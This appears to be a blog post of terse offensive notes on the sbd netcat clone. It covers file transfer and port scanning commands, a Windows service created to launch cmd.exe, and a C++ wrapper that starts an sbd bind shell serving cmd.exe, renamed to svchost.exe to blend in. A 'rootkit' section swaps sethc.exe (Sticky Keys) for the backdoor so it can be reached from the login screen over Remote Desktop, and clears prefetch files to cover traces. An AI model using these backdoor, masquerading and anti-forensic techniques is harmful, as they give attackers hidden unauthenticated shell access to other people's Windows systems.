Transfering files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10
Transfering files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337
PORT Scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000
Using Cmd.exe to bind to service
In my experience this is flaky at best..
create then start service:
sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc
sc start testsvc
Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).
SCM starts a service
RegisterServiceCtrlHandler API
We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.
Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}
Rootkit portion
Rename output binary to sethc.exe .. works ok.
Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.
Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.
Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.
Can there fake handler for WM_CLOSE? or terminate...
Posts
No comments:
Post a Comment